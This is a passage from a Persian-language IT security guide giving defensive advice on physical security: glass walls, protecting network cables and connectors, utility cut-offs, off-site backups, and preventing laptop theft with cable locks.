ﻻ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺟﻠﻮﻩ ﻣﻌﻤﺎﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻄﺮﺍﺕ ﺟـﺪﻱ ﺍﻣﻨﻴﺘـﻲ ﮔﺮﭼﻪ ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﻭ ﭘﻨﺠﺮﻩﻫﺎﻱ ﺑﺰﺭﮒ ﻣﻌﻤﻮ ﹰ
ﺑﺎﺷﻨﺪ .ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﺑﻪ ﺭﺍﺣﺘﻲ ﺷﻜﺴﺘﻪ ﻣﻲﺷﻮﻧﺪ؛ ﻳﻚ ﺁﺟﺮ ﺑﺎ ﻳﻚ ﺑﻄﺮﻱ ﺑﻨﺰﻳﻦ ﻛـﻪ ﺑـﻪ ﻃـﺮﻑ ﭘﻨﺠـﺮﻩ ﭘﺮﺗـﺎﺏ ﺷـﻮﺩ ﻣـﻲﺗﻮﺍﻧـﺪ
ﺧﺮﺍﺑﻴﻬﺎﻱ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪﺍﻱ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ .ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺳﺎﺩﮔﻲ ﺍﺯ ﻃﺮﻳﻖ ﺗﻤﺎﺷﺎﻱ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﻳﻮﺍﺭ ﺷﻴﺸﻪﺍﻱ ﻳﺎ
ﭘﻨﺠﺮﻩ ﻫﺴﺘﻨﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺣﻴﺎﺗﻲ ﻣﺎﻧﻨﺪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻳﺎ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍﺟﻊ ﺑﻪ ﻋﻤﻠﻜﺮﺩ ﺳﻴﺴﺘﻢ ﻛﺴﺐ ﻛﻨﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺘـﻮﺍﻥ
ﺍﻃﻼﻋﺎﺕ ﭘﺸﺖ ﻳﻚ ﺻﻔﺤﺔ ﻣﺎﺕ ﺭﺍ ﺑﺎ ﺗﺤﻠﻴﻞ ﺍﻣﻮﺍﺝ ﻧﻮﺭ ﺑﺎﺯﺗﺎﺑﻲ ﺁﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩ .ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﺩﺍﺧﻠـﻲ ﺑـﺮﺍﻱ ﺍﺗﺎﻗﻬـﺎﻳﻲ ﻛـﻪ ﺑﺎﻳـﺪ
ﺣﻔﺎﻇﺖ ﺷﻮﻧﺪ ﺍﻣﺎ ﻧﮕﻬﺒﺎﻥ ﻣﺠﺎﺯ ﺑﻪ ﻭﺭﻭﺩ ﻧﻤﻲﺑﺎﺷﺪ ﺧﻮﺏ ﻫﺴﺘﻨﺪ؛ ﺍﻣﺎ ﺩﺭ ﺗﻤﺎﻡ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ.
ﻛﺎﺑﻠﻬﺎﻱ ﺷﺒﻜﻪ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺷﺨﺺ ﺗﺨﺮﻳﺒﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻞ ﺯﻳﺮﺷﺒﻜﺔ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺭﺍ ﺑﺎ ﻗﻄﻊ ﺗﻨﻬﺎ ﻳﻚ ﺳﻴﻢ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳـﻴﻢﭼـﻴﻦ
ﺍﺯ ﻛﺎﺭ ﺑﻴﻨﺪﺍﺯﺩ .ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮﻧﻮﺭﻱ ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ Ethernetﺁﺳﻴﺐﭘﺬﻳﺮﺗﺮ ﻫﺴﺘﻨﺪ )ﺁﺳﺎﻧﺘﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﺳﻴﺐ ﺑﺒﻴﻨﻨﺪ( ،ﻣﺸﻜﻠﺘﺮ ﺗﺮﻣﻴﻢ ﻣـﻲﺷـﻮﻧﺪ
)ﺳﺨﺖ ﺑﻪ ﻫﻢ ﭘﻴﻮﻧﺪ ﻣﻲﺧﻮﺭﻧﺪ( ،ﻭ ﺍﻫﺪﺍﻑ ﺟﺬﺍﺑﺘﺮﻱ ﻫﺴﺘﻨﺪ )ﻣﻌﻤﻮ ﹰﻻ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺗﺒﺎﺩﻝ ﻣﻲﻛﻨﻨﺪ(.
ﻻ ﺍﺯ ﻛﺎﺑﻞﻛﺸﻲﻫﺎﻱ "ﻣﻮﻗﺖ" ﺩﺭ ﺗﺄﺳﻴﺴﺎﺕ ،ﺑﺼﻮﺭﺕ ﺩﺍﺋﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؛ ﭘﺲ ﻭﻗﺖ ﻭ ﺗﻼﺵ ﺑﻴﺸﺘﺮﻱ ﺻﺮﻑ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﻫﻤﺎﻥ ﻣﻌﻤﻮ ﹰ
ﺍﺑﺘﺪﺍ ﻛﺎﺑﻞ ﺭﺍ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﻧﺼﺐ ﻧﻤﺎﻳﻴﺪ .ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻳﻚ ﻛﺎﺑﻞ ﺷﺒﻜﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺁﻧﺮﺍ ﺍﺯ ﻣﺤﻠﻬﺎﻱ ﻭﺍﺟـﺪ ﺍﻣﻨﻴـﺖ
ﻓﻴﺰﻳﻜﻲ ﻋﺒﻮﺭ ﺩﻫﻴﻢ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ Ethernetﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻣﻴﺎﻥ ﻣﺠﺎﺭﻱ ﻓﻮﻻﺩﻱ ﻋﺒﻮﺭ ﺩﺍﺩﻩ ﺷﻮﺩ .ﺍﻳﻦ ﺷﻴﻮﻩ ﻋﻼﻭﻩ ﺑﺮ ﺣﻔﺎﻇـﺖ ﺩﺭ ﻣﻘﺎﺑـﻞ
ﺗﺨﺮﻳﺐ ،ﺩﺭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺑﻌﻀﻲ ﺍﻧﻮﺍﻉ ﺍﺳﺘﺮﺍﻕﺳﻤﻊﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻧﻴﺰ ﻛﺎﺭﺳﺎﺯ ﺍﺳﺖ ،ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺑﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺩﺭﺻـﻮﺭﺕ ﻭﻗـﻮﻉ ﻳـﻚ
ﺁﺗﺶﺳﻮﺯﻱ ﻛﻮﭼﻚ ﻫﻢ ﺣﻔﻆ ﻛﻨﺪ .ﺍﮔﺮ ﻛﺴﻲ ﺭﻭﻱ ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮﻧﻮﺭﻱ ﭘﺎ ﺑﮕﺬﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻧﻬﺎ ﺷﻜﺴﺘﮕﻲﻫﺎﻱ ﻛﻮﭼﻚ ﺭﺥ ﺩﻫـﺪ.
ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳﻚ ﺷﻜﺴﺘﮕﻲ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﻣﺸﻜﻞ ﺍﺳﺖ ،ﭼﻮﻥ ﺍﺛﺮﻱ ﺍﺯ ﺁﻥ ﺩﺭ ﺭﻭﻛﺶ ﻛﺎﺑﻞ ﺩﻳﺪﻩ ﻧﻤﻲﺷﻮﺩ.
ﺑﺮﺧﻲ ﺍﺯ ﺗﺄﺳﻴﺴﺎﺕ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﺍﺯ ﻛﺎﻧﺎﻟﻬﺎﻱ ﺩﻭ ﺟﺪﺍﺭﺓ ﺣﻔﺎﻅﺩﺍﺭ ﻛﻪ ﺩﺭ ﻣﻴﺎﻥ ﻻﻳﻪﻫﺎﻱ ﺁﻥ ﮔﺎ ﹺﺯ ﻓﺸﺮﺩﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ .ﺍﮔـﺮ
ﻓﺸﺎﺭ ﺩﺭﻭﻥ ﺟﺪﺍﺭﻩﻫﺎ ﭘﺎﻳﻴﻦ ﺑﻴﺎﻳﺪ ﻓﺸﺎﺭﻳﺎﺏﻫﺎﻱ ﻛﺎﻧﺎﻝ ﺗﺮﺍﻓﻴﻚ ﮔﺬﺭﻧﺪﻩ ﺍﺯ ﺧﻄﻮﻁ ﺭﺍ ﻣﺘﻮﻗﻒ ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﺯﻧﮓ ﺧﻄﺮ ﺭﺍ ﺑﻪ ﺻﺪﺍ ﺩﺭ ﻣﻲﺁﻭﺭﻧﺪ.
ﻼ ﺷﺨﺼﻲ ﺩﺭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﻛﺎﻧﺎﻝ ﻣﻨﻔﺬ ﺍﻳﺠﺎﺩ ﻛﻨﺪ.ﺍﻳﻨﺤﺎﻟﺖ ﻭﻗﺘﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻣﺜ ﹰ
ﺍﺗﺼﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ
ﻋﻼﻭﻩ ﺑﺮ ﺑﺮﻳﺪﻥ ﻳﻚ ﻛﺎﺑﻞ ،ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﻪ ﻳﻚ ﭘﺎﻳﺎﻧﺔ ﺷﺒﻜﻪ -ﻳﺎ ﻳﻚ ﺍﺗﺼﺎﻝﺩﻫﻨﺪﺓ ﺷﺒﻜﻪ -ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻕ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ
ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ ﻳﺎ ﺷﺒﻜﻪ ﺭﺍ ﺩﭼﺎﺭ ﺁﺳﻴﺐ ﻛﻨﺪ .ﻫﻤﺔ ﺷﺒﻜﻪﻫﺎﻱ ﻛﺎﺑﻠﻲ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﻭﻟﺘﺎﮊ ﻗﻮﻱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ.
ﺍﺗﺼﺎﻻﺕ ﻭﺳﺎﻳﻞ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ﻗﻄﻊ ﻛﺮﺩﻥ ﺑﺮﻕ ،ﮔﺎﺯ ﻭ ﺁﺏ -ﮔﺎﻫﻲ ﺣﺘﻲ ﺍﺯ ﺧﺎﺭﺝ ﺳﺎﺧﺘﻤﺎﻥ -ﺑﺮﺍﺣﺘﻲ ﻣﻴﺴﺮ ﺍﺳﺖ .ﭼـﻮﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧﻴـﺎﺯ ﺑـﻪ
ﺍﻧﺮﮊﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺩﺍﺭﻧﺪ ،ﻭ ﭼﻮﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﮔﺮﻣﻜﻦﻫﺎﻱ ﮔﺎﺯﻱ ﻳﺎ ﺳﺮﺩﻛﻦﻫﺎﻱ ﺁﺑﻲ ﻭﺍﺑﺴﺘﻪ ﺑﺎﺷﻨﺪ ،ﺍﻳـﻦ ﺍﻣـﺮ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺗﺨﺮﻳﺒﮕﺮ ﻧﻘﺎﻁ ﺍﻧﺠﺎﻡ ﺣﻤﻠﺔ ﺟﺪﻳﺪ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ.
ﭼﻮﻥ ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻼﺕ ﻏﻴﺮﻣﻤﻜﻦ ﺍﺳﺖ ،ﺳﻴﺴﺘﻤﻲ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻓﻮﺭﻱ ﻭ ﺩﻳﺴﻜﻬﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﻧﻌﮑﺎﺳـﻲ
ﺭﺍ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺑﺎ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺒﻜﺔ ﻧﺴﺒﺘﹰﺎ ﺳﺮﻳﻊ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺮﺗﻴﺒﻲ ﺩﻫﻴﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺭﻭﻱ ﻳﻚ ﻛـﺎﻣﭙﻴﻮﺗﺮ ﻫﻤﺰﻣـﺎﻥ
ﺭﻭﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﻭﺍﻗﻊ ﺩﺭ ﺳﻮﻱ ﺩﻳﮕﺮ ﺷﻬﺮ ﻳﺎ ﺁﻧﺴﻮﻱ ﺟﻬﺎﻥ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺷﻮﻧﺪ .ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻫﻤﺰﻣـﺎﻥ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ dumpﻫﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺳﺎﻋﺘﻲ ﻳﺎ ﺷﺒﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﮔﺮﭼﻪ ﻳﻚ ﺑﻤﺒﮕﺬﺍﺭﻱ ﺍﻧﺘﺤﺎﺭﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻛﺰ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﺷﻤﺎ ﺭﺍ ﻧﺎﺑﻮﺩ ﻛﻨﺪ ،ﺍﻣﺎ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺟﺎﻱ ﺩﻳﮕﺮ ﻭ ﺑﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺧﺎﻃﺮ ﺣﻔﺎﻇﺖ ﻧﻤﻮﺩ.
ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ -ﺧﺼﻮﺻﹰﺎ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ -ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺗﺠﺮﺑﺔ ﺁﺯﺍﺭﺩﻫﻨﺪﻩ ﺑﺎﺷﺪ ،ﺍﻣـﺎ ﺍﮔـﺮ ﺭﺍﻳﺎﻧـﻪ ﺣـﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ ﻏﻴﺮﻗﺎﺑـﻞ
ﺟﺎﻳﮕﺰﻳﻨﻲ ﻳﺎ ﻓﻮﻕﺍﻟﻌﺎﺩﻩ ﺣﺴﺎﺱ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﻗﺮﺑﺎﻧﻲ ﮔﺮﺍﻥ ﺗﻤﺎﻡ ﺷﻮﺩ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﺑﻪ ﺳﺮﻗﺖ ﻣﻲﺭﻭﻧﺪ -ﻳﺎ ﺑﺼﻮﺭﺕ ﺳﻴـﺴﺘﻢ ﻛﺎﻣـﻞ ﻭ ﻳـﺎ ﺍﮔـﺮ ﺳـﺎﺭﻗﺎﻥ ﺧﺒـﺮﻩ ﺑﺎﺷـﻨﺪ
ﺑﺼﻮﺭﺕ ﻗﻄﻌﺎﺕ ﻣﺠﺰﺍ ،ﻛﻪ ﺭﺩﻳﺎﺑﻲ ﻛﺮﺩﻧﺸﺎﻥ ﻣﺸﻜﻠﺘﺮ ﺍﺳﺖ .ﺑﻌﻀﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗﻮﺳﻂ ﻛﺴﺎﻧﻲ ﺑﻪ ﺳﺮﻗﺖ ﺑﺮﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ
ﻻ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﺁﻥ ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺗﻬﻴﻪ ﻛﻨﻨﺪ .ﺑﻌﻀﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻫﻢ ﺑﻪ ﺧﺎﻃﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﻣﻌﻤﻮ ﹰ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٨٦
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ ﻭ ﺍﻟﺒﺘﻪ ﮔﺎﻫﻲ ﻫﻢ ﺗﻮﺳﻂ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺻﺎﺣﺐ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ ﻛـﺎﺭﺑﺮﺩ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﺤـﺮﻭﻡ ﻛﻨﻨـﺪ ﺑـﻪ
ﺳﺮﻗﺖ ﻣﻲﺭﻭﻧﺪ .ﻣﻬﻢ ﻧﻴﺴﺖ ﻛﻪ ﭼﺮﺍ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷﻮﺩ؛ ﻏﺎﻟﺐ ﺳﺮﻗﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﻚ ﻋﻨﺼﺮ ﻣﺸﺘﺮﻙ ﺩﺍﺭﻧﺪ :ﻓﺮﺻﺖ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ
ﺍﺯ ﻣﻮﺍﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﺪﻭﻥ ﻣﺤﺎﻓﻈﺖ ﺭﻫﺎ ﺷﺪﻩ ﺑﻮﺩﻧﺪ.
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻳﺎ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤﻞ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧﺪ .ﺁﻧﻬﺎ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﻪ ﺳﺮﻗﺖ ﻣـﻲﺭﻭﻧـﺪ ،ﻣﺤﻜـﻢ
ﺑﺴﺘﻦ ﺁﻧﻬﺎ ﺑﻪ ﺟﺎﻳﻲ ﻣﺸﻜﻞ ﺍﺳﺖ )ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺩﻳﮕﺮ ﺳﻴﺎﺭ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ!( ،ﻭ ﺑﻪ ﺳﺎﺩﮔﻲ ﺑﻪ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﻣﻲﺭﺳﻨﺪ .ﻛﺴﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ
ﻛﻴﻔﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺁﻣﻮﺯﺵ ﺑﺒﻴﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺸﺎﻥ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻨﺪ .ﮔﺰﺍﺭﺵ ﺷﺪﻩ ﻛﻪ ﺳﺮﻗﺖ ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫـﺎ
ﺑﺨﺼﻮﺹ ﺩﺭ ﻓﺮﻭﺩﮔﺎﻫﻬﺎ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻳﻚ ﻣﻌﻀﻞ ﺍﺳﺎﺳﻲ ﺍﺳﺖ .ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻧﺒﺎﻳﺪ ﺩﺭ ﻫﻴﭻ ﻛﺠﺎ ﻭ ﺑﺮﺍﻱ ﻫﻴﭻ ﻣﺪﺗﻲ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ
ﺭﻫﺎ ﺷﻮﻧﺪ .ﺍﮔﺮ ﺷﻤﺎ ﺑﺎ ﺗﺎﻛﺴﻲ ﻣﺴﺎﻓﺮﺕ ﻣﻲﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺻﻨﺪﻭﻕﻋﻘﺐ ﻣﺎﺷﻴﻦ ،ﻧﺰﺩ ﺧﻮﺩﺗﺎﻥ ﻧﮕﻬﺪﺍﺭﻳﺪ.
ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﻗﺪﺍﻣﺎﺕ ﻛﻢﻫﺰﻳﻨﻪ ﻭ ﺳﺎﺩﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺧﻄﺮ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔـﻲ ﻳـﺎ ﺭﻭﻣﻴـﺰﻱ ﺭﺍ ﺑـﻪ ﻣﻴـﺰﺍﻥ ﺯﻳـﺎﺩﻱ
ﻛﺎﻫﺶ ﺩﻫﻴﺪ.
ﻗﻔﻠﻬﺎ
ﻳﻜﻲ ﺍﺯ ﺭﺍﻫﻬﺎﻱ ﺧﻮﺏ ﺣﻔﺎﻇﺖ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺳﺮﻗﺖ ،ﺍﻳﻤﻦﺳﺎﺯﻱ ﻓﻴﺰﻳﻜﻲ ﺁﻥ ﺍﺳﺖ .ﺍﺗﺼﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺑﺴﺘﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ
ﺑﻪ ﻣﻴﺰﻫﺎ ﻭ ﻛﺎﺑﻴﻨﺖﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﺍﮔﺮﭼﻪ ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺳﺮﻗﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺩﺷﻮﺍﺭﺗﺮ ﻣﻲﺳﺎﺯﻧﺪ.
ﻗﺎﺑﻠﻴﺖ ﺣﻤﻞ ﺁﺳﺎﻥ ﻳﻚ ﻋﺎﻣﻞ ﻣﻬﻢ ﻓﺮﻭﺵ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺻﻠﻲﺗﺮﻳﻦ ﺩﻟﻴﻞ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺁﻧﻬﺎ ﺍﺳـﺖ .ﻳﻜـﻲ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ
ﺭﺍﻫﻬﺎ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺍﺣﺘﻤﺎﻝ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺣﺪﺍﻗﻞ ﺑﻄﻮﺭ ﻣﻮﻗﺖ ﺁﻧﺮﺍ ﺑﻪ ﻣﻴﺰ ،ﻳﻚ ﻟﻮﻟﻪ ﻳـﺎ ﻳـﻚ ﺷـﻲﺀ ﺑـﺰﺭﮒ
ﺩﻳﮕﺮ ﻗﻔﻞ ﻛﻨﻴﺪ.
ﺑﻴﺸﺘﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﻨﺪ ﻣﺠﻬﺰ ﺑﻪ ﻳﻚ ﺷﻴﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ .ﺑﺎ ﻗﻴﻤﺖ ﻛﻤﺘﺮ ﺍﺯ ۵۰ﺩﻻﺭ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﻗﻔـﻞ
ﻛﺎﺑﻠﻲ ﺧﺮﻳﺪ ﻛﻪ ﺷﻴﺎﺭ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔﻲ ﺭﺍ ﺑﻪ ﺍﺷﻴﺎﺀ ﻧﺰﺩﻳﻚ ﺁﻥ ﻗﻔﻞ ﻣﻲﻛﻨﺪ .ﺍﮔﺮ ﺩﺳﺘﮕﺎﻩ ﺑﻪ ﺟﺎﻳﻲ ﻗﻔﻞ ﺷﻮﺩ ﻧﻤﻲﺗـﻮﺍﻥ ﺑـﺪﻭﻥ ﺩﺍﺷـﺘﻦ
ﻛﻠﻴﺪ ﻳﺎ ﺁﺳﻴﺐ ﺭﺳﺎﻧﺪﻥ ﺑﻪ ﺩﺳﺘﮕﺎﻩ ﺁﻧﺮﺍ ﺑﺎﺯ ﻛﺮﺩ ،ﻭ ﺩﺭﺻﻮﺭﺕ ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻫﻢ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﺁﻥ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺧﻮﺍﻫﺪ ﺷـﺪ .ﺍﻳﻨﮕﻮﻧـﻪ
